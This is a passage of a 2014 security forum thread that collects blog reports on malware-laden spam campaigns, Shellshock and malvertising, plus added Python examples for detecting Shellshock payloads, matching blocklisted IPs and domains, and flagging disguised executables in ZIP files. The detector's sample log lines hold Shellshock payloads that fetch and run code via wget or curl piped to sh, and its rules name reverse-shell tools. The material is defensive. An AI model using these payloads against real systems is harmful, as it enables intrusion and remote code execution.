* https://www.virustotal.com/en/file/a...is/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustotal.com/en/ip-add...6/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
___
Fake Bank SPAM - leads to malware
- http://blog.dynamoo.com/2014/09/malw...cial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
Lloyds Commercial Bank "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 29 September 2014 11:03
Subject: Important - Commercial Documents
Important account documents
Reference: C947
Case number: 18868193
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...
HSBC Bank UK "Payment Advice Issued"
From: HSBC Bank UK
Date: 29 September 2014 11:42
Subject: Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...
The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustotal.com/en-gb/fil...e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustotal.com/en/ip-add...1/information/
81.88.48.71: https://www.virustotal.com/en/ip-add...1/information/
188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
___
Fake Order SPAM
- http://myonlinesecurity.co.uk/order-...61864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email. All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
Kind regards,
Sales Department
Tiana Haggin ...
Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
Current Virus total detections: 3/55*. This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2...is/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustotal.com/en/ip-add...9/information/
23.62.99.24: https://www.virustotal.com/en/ip-add...4/information/
213.186.33.4: https://www.virustotal.com/en/ip-add...4/information/
___
More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecurity.co.uk/new-vo...e-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The Voice Mail message has been uploaded to the following web
address ...
You can play this Voice Mail on most computers.
Please do not reply to this message. This is an automated message which
comes from an unattended mailbox.
This information contained within this e-mail is confidential to, and is
for the exclusive use of the addressee(s).
If you are not the addressee, then any distribution, copying or use of this
e-mail is prohibited.
If received in error, please advise the sender and delete/destroy it
immediately.
We accept no liability for any loss or damage suffered by any person
arising from use of this e-mail.
... the link in the email is broken because the idiots who crafted the email messed up the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55*. This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4...is/1412003182/
___
'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malwarebytes.org/fraud-...e-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
“Kindly Re-Validate Your Mailbox
Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
To renew the mailbox,
click link below: [removed]
Thank you!
Web mail system administrator!
WARNING! Protect your privacy. Logout when you are done and completely
exit your browser.”
The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___
Bash Bug vulnerability
- http://www.symantec.com/connect/blog...-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec.com/connect/site...m-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."
Table of C&C Servers:
- http://blog.trendmicro.com/trendlabs...9/Table-01.jpg
89.238.150.154: https://www.virustotal.com/en/ip-add...4/information/
108.162.197.26: https://www.virustotal.com/en/ip-add...6/information/
162.253.66.76: https://www.virustotal.com/en/ip-add...6/information/
213.5.67.223: https://www.virustotal.com/en/ip-add...3/information/
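The FireEye and Symantec excerpts above describe the in-the-wild Shellshock traffic as high-volume automated scans whose payload rides in an HTTP header that a CGI-backed web server exports as an environment variable; the "() {" function-definition prefix is what triggers the bug, and the command tacked on after the closing brace is what runs. The following Python detector is an added example, not code from either vendor's post: it runs over a few constructed Apache-style access-log lines and one raw header line (addresses, paths and payloads are invented for illustration), pulls out the appended command and sorts it into the rough categories FireEye listed (droppers, reverse shells, ping-backs).

```python
import re
from typing import Dict, List

# Shellshock (CVE-2014-6271) works because bash treated any environment
# variable whose value begins with "() {" as an exported function and, before
# the fix, kept executing whatever followed the closing brace. A CGI-backed web
# server exports request headers as environment variables (HTTP_USER_AGENT,
# HTTP_REFERER, HTTP_COOKIE, ...), so scanners put "() { :;}; <command>" into a
# header and the command runs with the web server's privileges.
#
# The regex matches that prefix, tolerating the whitespace variants seen in
# scans, and captures the appended command for triage.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")

# Constructed sample input (not real traffic): Apache combined-log lines whose
# last field is the User-Agent, plus one raw Referer header.
SAMPLE_LINES = [
    '203.0.113.5 - - [27/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    "\"() { :;}; /bin/bash -c 'wget -O /tmp/x http://198.51.100.7/x; chmod +x /tmp/x; /tmp/x'\"",
    '198.51.100.9 - - [27/Sep/2014:10:01:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"',
    "Referer: () { :; }; /usr/bin/curl http://198.51.100.7/cmd | sh",
    '192.0.2.4 - - [27/Sep/2014:10:02:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 200 16 "-" '
    '"() { ignored; }; /bin/ping -c 1 198.51.100.7"',
]


def classify(cmd: str) -> str:
    """Rough triage bucket along the lines of the categories FireEye listed."""
    if re.search(r"\b(wget|curl|tftp)\b", cmd):
        return "dropper"          # fetch-and-run a second stage
    if re.search(r"/dev/tcp/|\b(nc|ncat|socat)\b", cmd):
        return "reverse-shell"
    if re.search(r"\bping\b", cmd):
        return "ping-back"        # blind check that the target executed anything
    return "other"


def find_shellshock(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per line that carries a Shellshock-style payload."""
    hits = []
    for line in lines:
        m = SHELLSHOCK_RE.search(line)
        if not m:
            continue
        # Drop the closing quote of the log field so the command reads cleanly.
        cmd = m.group("cmd").strip().rstrip('"').strip()
        hits.append({"line": line, "command": cmd, "kind": classify(cmd)})
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LINES):
        print(f"[{hit['kind']}] {hit['command']}")
```

The regex deliberately keys on the function-definition prefix rather than on any particular command, since the payloads vary per scan; the `classify` buckets are only a first triage and anything landing in "other" deserves a manual look.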
Fake NatWest, new FAX, Delta Air SPAM
FYI...
Fake NatWest, new FAX SPAM
- http://blog.dynamoo.com/2014/09/malw...-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:
NatWest: "You have a new Secure Message"
From: NatWest [secure.message@ natwest .com]
Date: 30 September 2014 09:58
Subject: You have a new Secure Message - file-3800
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...
"You've received a new fax"
From: Fax [fax@victimdomain .com]
Date: 30 September 2014 09:57
Subject: You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustotal.com/en/file/1...is/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-add...2/information/
69.89.22.130: https://www.virustotal.com/en/ip-add...0/information/
___
Fake Delta Air SPAM - word doc malware
- http://myonlinesecurity.co.uk/delta-...d-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Order Notification,
E-TICKET NUMBER / ET-98191471
SEAT / 79F/ZONE 1
DATE / TIME 2 OCTOBER, 2014, 11:15 PM
ARRIVING / Berlin
FORM OF PAYMENT / XXXXXX
TOTAL PRICE / 214.61 GBP
REF / OE.2368 ST / OK
BAG / 3PC
Your electronic ticket is attached to the letter as a scan document.
You can print your ticket.
Thank you for your attention.
Delta Air Lines.
30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55*. This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3...is/1412075964/
Fake Police 'Suspect', Invoice SPAM
FYI...
Fake Police 'Suspect' SPAM
- http://blog.dynamoo.com/2014/10/homi...tant-spam.html
1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
From: ALERT@ police .uk [ALERT@ police-uk .com]
Date: 1 October 2014 08:49
Subject: Homicide Suspect - important
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-49627
Bulletin Author: BARILLAS #1264
Sending User #: 56521
APBnet Version:
The bulletin is a pdf file. To download please follow the link below ...
Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
* https://www.virustotal.com/en/file/5...is/1412150049/
** https://anubis.iseclab.org/?action=r...da&format=html
___
Something evil on 87.118.127.230
- http://blog.dynamoo.com/2014/10/some...118127230.html
1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."
87.118.127.230: https://www.virustotal.com/en/ip-add...0/information/
___
Fake 'Booking Cancellation' SPAM
- http://blog.dynamoo.com/2014/10/ukts...cellation.html
1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
From: email@ uktservices .com
Date: 1 October 2014 14:01
Subject: Booking Cancellation
Hello.
Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
Here is a link to your updated bookings view...
All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."
37.235.56.121: https://www.virustotal.com/en/ip-add...1/information/
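Several of the dynamoo excerpts in this thread end with a blocking recommendation: the whole 83.166.234.0/24 range, the exploit-kit hosts 87.118.127.230 and 37.235.56.121, the Shellshock collector 82.118.242.223, and call-back names such as very-english .co.uk, cuscorock .com and santace .com. The Python below is an added example, not from any of the quoted posts: it turns those indicators into a small IOC set, checks constructed netfilter and BIND query-log lines against it (the log formats and the 10.0.0.x client addresses are invented), and renders the equivalent iptables rules for both directions. Subdomains of a listed zone are matched as well, since call-backs rarely use the bare apex.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Indicators taken from the quoted posts.
NETWORK_IOCS = [
    "83.166.234.0/24",    # MangoHost range
    "87.118.127.230/32",  # Keyweb host pushing an exploit kit
    "37.235.56.121/32",   # EDIS host fronting an exploit kit
    "82.118.242.223/32",  # Shellshock reverse-shell collector
]
DOMAIN_IOCS = {"very-english.co.uk", "cuscorock.com", "santace.com"}
NETS = [ipaddress.ip_network(n) for n in NETWORK_IOCS]

# Constructed log lines (not real data): netfilter LOG target output and
# BIND query logging.
SAMPLE_LOGS = [
    "Oct 01 14:03:11 fw kernel: IN=eth1 OUT=eth0 SRC=10.0.0.23 DST=37.235.56.121 PROTO=TCP DPT=8080",
    "Oct 01 14:03:12 fw kernel: IN=eth1 OUT=eth0 SRC=10.0.0.23 DST=198.51.100.20 PROTO=TCP DPT=443",
    "Oct 01 14:05:40 fw kernel: IN=eth0 OUT=eth1 SRC=83.166.234.133 DST=10.0.0.5 PROTO=TCP DPT=22",
    "Oct 01 14:06:01 dns named[1234]: client 10.0.0.31#51512: query: cuscorock.com IN A +",
    "Oct 01 14:06:02 dns named[1234]: client 10.0.0.31#51513: query: mail.example.org IN A +",
    "Oct 01 14:07:09 dns named[1234]: client 10.0.0.8#40211: query: www.santace.com IN A +",
]

IP_RE = re.compile(r"\b(?:SRC|DST)=(\d{1,3}(?:\.\d{1,3}){3})")
QUERY_RE = re.compile(r"query: ([A-Za-z0-9.-]+) IN ")


def match_ip(ip_text: str) -> Optional[str]:
    """Return the IOC network that contains ip_text, or None."""
    ip = ipaddress.ip_address(ip_text)
    for net in NETS:
        if ip in net:
            return str(net)
    return None


def match_domain(name: str) -> Optional[str]:
    """Return the IOC zone that name equals or sits under, or None."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):          # walk up: www.x.com, x.com
        candidate = ".".join(labels[i:])
        if candidate in DOMAIN_IOCS:
            return candidate
    return None


def scan(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Yield (line, kind, observed, matched_ioc) for every IOC hit."""
    hits = []
    for line in lines:
        for ip in IP_RE.findall(line):
            net = match_ip(ip)
            if net:
                hits.append((line, "ip", ip, net))
        for qname in QUERY_RE.findall(line):
            zone = match_domain(qname)
            if zone:
                hits.append((line, "domain", qname, zone))
    return hits


def render_block_rules() -> List[str]:
    """iptables rules dropping traffic to and from every IOC network."""
    rules = []
    for net in NETWORK_IOCS:
        rules.append(f"iptables -A INPUT -s {net} -j DROP")
        rules.append(f"iptables -A OUTPUT -d {net} -j DROP")
    return rules


if __name__ == "__main__":
    for line, kind, observed, ioc in scan(SAMPLE_LOGS):
        print(f"{kind:6} {observed:20} -> {ioc}\n    {line}")
    print("\n".join(render_block_rules()))
```

Dropping the /24 as a whole is the blunt option dynamoo suggests; if that is too broad for your environment, feed the same `match_ip`/`match_domain` checks into alerting instead and block only the individual hosts.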
___
More Fake Invoice SPAM
- http://myonlinesecurity.co.uk/invoic...e-pdf-malware/
1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-con...ital_email.png
There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently, some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on your antivirus to protect you from these types of malware.
Today's Date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6...is/1412153387/
___
Fake 'Cashbuild Copied invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/cashbu...e-pdf-malware/
1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
get copies of invoices. We will not be able to pay them. Please send clear invoices
1 October 2014: copies_908705.zip ( 10kb): Extracts to: copies_908705.exe
Current Virus total detections: 0/55*. This 'Cashbuild Copied invoices' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8...is/1412156828/
___
GNU bash vulns...
- http://www.securitytracker.com/id/1030890
Updated: Oct 3 2014*
Original Entry Date: Sep 24 2014
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/d...=CVE-2014-7187 - 10.0 (HIGH)
* ... archive entries have one or more follow-up message(s)...
___
DoubleClick abused - malvertising
- https://blog.malwarebytes.org/malver...ising-attacks/
30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
> https://blog.malwarebytes.org/wp-con...9/overview.png
... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
* https://blog.malwarebytes.org/malver...lick-and-zedo/
** https://blog.malwarebytes.org/exploi...ael-newspaper/
*** https://www.virustotal.com/en/file/5...is/1412048718/
Fake invoice, lawyer SPAM
FYI...
Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoic...e-xls-malware/
2 Oct 2014 - "'Invoice IDS107587_815' pretending to come from billing department at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-con...107587_815.png
This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper Microsoft excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___
Fake lawyer SPAM - PDF malware
- http://myonlinesecurity.co.uk/docume...e-pdf-malware/
2 Oct 2014 - "'document from lawyer' pretending to come from random names at yahoo .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are a multitude of similar type subjects with this one including:
document from lawyer
resend the fax
document’s from lawyer
document review
notarized document from lawyer
The document from lawyer email is very plain and simple and has a very simple 2 or 3 word content in bold: 'Document Review Lawyer' or document 'review consultant' or 'The law firm' and it attaches a file that pretends to be a copy of a fax...
2 October 2014: facsimile_page2_10.02.2014.zip: Extracts to: facsimile_page2_10.02.2014.exe
Current Virus total detections: 5/55*. This 'document from lawyer' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4...is/1412241170/
___
Fake 'Shipping' SPAM - .scr malware
- http://myonlinesecurity.co.uk/po-948...pping-malware/
2 Oct 2014 - "'PO-94864-PM Shipping' pretending to come from somebody called Leta Potts is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has 2 different versions of the text, depending on whether you read emails in full html when they can show pictures and formatting or in plain text... The email plain text version looks like:
Hi April,
PO-61814-PM is ready to ship. Attached please find the receipt and UPS tracking is below.
UPS Tracking Number: 1ZY79R600397981039
Thank you and have a wonderful afternoon.
Amy Fling
Pro Shoe Covers
503-807-1642
800-978-1786
www. ProShoeCovers .com
129 Pendleton Way, #31
Washougal, WA 98671
OMWBE Certified
Women’s Business Enterprise ...
The html version looks like:
April,
Please see attached draw. Thanks
Leta Potts
Conquest Electrical Contracting, LLC
Owner/Operator
12307 Roxie Drive, Ste. 215
Austin, TX 78729
Cell 925 487-5121
Office 925 524-2651 ...
2 October 2014: docs100214.zip - Extracts to: mydocs.scr
Current Virus total detections: 0/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like an icon of a blue folder with a silver key instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f...is/1412253608/
- http://www.ehow.com/info_8510148_scr-file.html
"... Viruses and other malicious software may be installed in SCR files, as the file type is -executable- or capable of installing code..."
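Nearly every lure quoted in this thread relies on the same trick the ehow note describes: a .exe, .scr or .pif inside a ZIP, named to look like a PDF, XLS, WAV or Word document and carrying a matching icon, so that with "Hide extensions for known file types" left on the victim sees "Invoice.xls" rather than "Invoice.xls.scr". The following Python is an added example, not code from any of the quoted posts: it inspects an archive member by member, flags executable and double extensions, and sniffs the first bytes so a PE header under a document name is caught too. The archive is built in memory from stand-in bodies (an "MZ" stub, not a working binary); the member names echo the lures above, the benign members and the magic-byte table are assumptions made for the demo.

```python
import io
import zipfile
from typing import Dict, List

# Windows runs these when double-clicked; with "Hide extensions for known file
# types" on (the default), Explorer shows "Invoice.xls.scr" as "Invoice.xls"
# and draws whatever icon the binary carries in its resource section.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js", "jse",
                   "wsf", "hta", "lnk", "ps1", "msi"}
# Document types the lures in this thread impersonate.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "wav", "jpg", "png", "txt"}
# Minimal magic-byte table for a content sanity check (assumption: enough for
# the cases here; a real gateway would use libmagic or equivalent).
MAGIC = [(b"MZ", "pe-executable"), (b"%PDF", "pdf"), (b"RIFF", "riff/wav"),
         (b"PK\x03\x04", "zip/ooxml")]


def classify_name(name: str) -> Dict[str, object]:
    """Final extension plus any document-looking inner extensions."""
    base = name.rsplit("/", 1)[-1]
    # strip() handles names like "PAYMENT DETAILS.PDF .scr_56453.exe"
    parts = [p.strip().lower() for p in base.split(".")]
    ext = parts[-1] if len(parts) > 1 else ""
    inner = [p for p in parts[1:-1] if p in DOCUMENT_EXTS]
    return {"ext": ext, "executable": ext in EXECUTABLE_EXTS, "disguised_as": inner}


def sniff(head: bytes) -> str:
    for magic, kind in MAGIC:
        if head.startswith(magic):
            return kind
    return "unknown"


def inspect_zip(zip_bytes: bytes) -> List[Dict[str, object]]:
    """Return a verdict per archive member: 'block' with reasons, or 'ok'."""
    report = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(8)
            meta = classify_name(info.filename)
            kind = sniff(head)
            reasons = []
            if meta["executable"]:
                reasons.append(f"executable extension .{meta['ext']}")
            if meta["disguised_as"]:
                reasons.append("double extension posing as " + "/".join(meta["disguised_as"]))
            if kind == "pe-executable" and not meta["executable"]:
                reasons.append("PE header but non-executable extension")
            report.append({"name": info.filename, "content": kind,
                           "disguised_as": meta["disguised_as"],
                           "verdict": "block" if reasons else "ok",
                           "reasons": reasons})
    return report


def build_sample_zip() -> bytes:
    """Constructed archive for the demo; names echo lures quoted in this thread,
    bodies are harmless stand-ins (an 'MZ' stub, not a working PE)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        stub = b"MZ\x90\x00" + b"\x00" * 60
        zf.writestr("Invoice_815992488951.xls.scr", stub)
        zf.writestr("voice448705888444.scr", stub)
        zf.writestr("PAYMENT DETAILS.PDF .scr_56453.exe", stub)
        zf.writestr("Remittance-Advice.exe", stub)
        zf.writestr("statement.pdf", b"%PDF-1.4\n% constructed placeholder\n")
        zf.writestr("notes.txt", b"plain text, nothing to see\n")
    return buf.getvalue()


if __name__ == "__main__":
    for entry in inspect_zip(build_sample_zip()):
        print(f"{entry['verdict']:5} {entry['name']!r:40} {entry['content']:14} "
              f"{'; '.join(entry['reasons'])}")
```

The extension check alone would already have stopped every sample in this thread; the magic-byte check is there for the case the blog does not cover, a PE renamed to a pure document extension, which will not run on double-click but still has no business in an invoice mail.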
___
Fake insurance photos SPAM - malware
- http://myonlinesecurity.co.uk/fwd-ph...mpany-malware/
2 Oct 2014 - "'Fwd: Photos from the insurance company' coming from random names and email addresses, most pretending to come from somebody @ntlworld .com is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email has a totally -blank- body with just the attachment named photo1.zip and subject of Fwd: Photos from the insurance company . It is exactly the -same- malware as in today’s document from lawyer* – fake PDF malware but instead of a fake fax it unzips to a pif file (windows shortcut). This 'Fwd: Photos from the insurance company' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/docume...e-pdf-malware/
___
Fake 'eDocument' SPAM – PDF malware
- http://myonlinesecurity.co.uk/santan...e-pdf-malware/
2 Oct 2014 - "'New eDocument arrived' pretending to come from e-Documents@ santander .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-con..._statement.png
... the malware is the -same- as in today’s 'document from lawyer'* – fake PDF malware. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/docume...e-pdf-malware/
___
O/S Market Share - Sep 2014:
- http://www.netmarketshare.com/operat...10&qpcustomd=0
[Still more XP users than Vista, Win8, and Win8.1 combined]
___
Fake invoice SPAM
- http://blog.mxlab.eu/2014/10/02/fake...ntains-trojan/
2 Oct 2014 - "... intercepted 2 trojan distribution campaigns by email.
Unpaid invoice notification
The first campaign has the following details:
[IMPORTANT] Unpaid invoice notification
[IMPORTANT] Latest letter on invoice overdue
Final letter before commencing legal action
Latest invoice
Latest letter on invoice overdue
Recent invoice
This email is sent from spoofed addresses and has the following body below. In the email, the amount that is due is specified in the GBP currency but no company or service is included in the message...
We are writing to you about fact, despite previous reminders, there remains an outstanding amount of GBP 234.60 in respect of the invoice(s) contained in this email . This was due for payment on 26 September, 2014.
Our credit terms stipulate full payment within 3 days and this amount is now 14 days overdue.The total amount due from you is therefore GBP 340.51
If the full amount of the sum outstanding, as set above, is not paid within 7 days of the date of this email, we shall begin legal action, without warning, for a court order requiring payment. We may also commence insolvency proceedings. Legal proceedings can affect any credit rating. The costs of legal proceedings and any other amounts which the court orders must also be paid in addition to the debt.
This letter is being sent to you in accordance with the Practice Direction on Pre-Action Conduct (the PDPAC) contained in the Civil Procedure Rules, The court has the power to sanction your continuing failure to respond.
You can find the original invoice in attachment below...
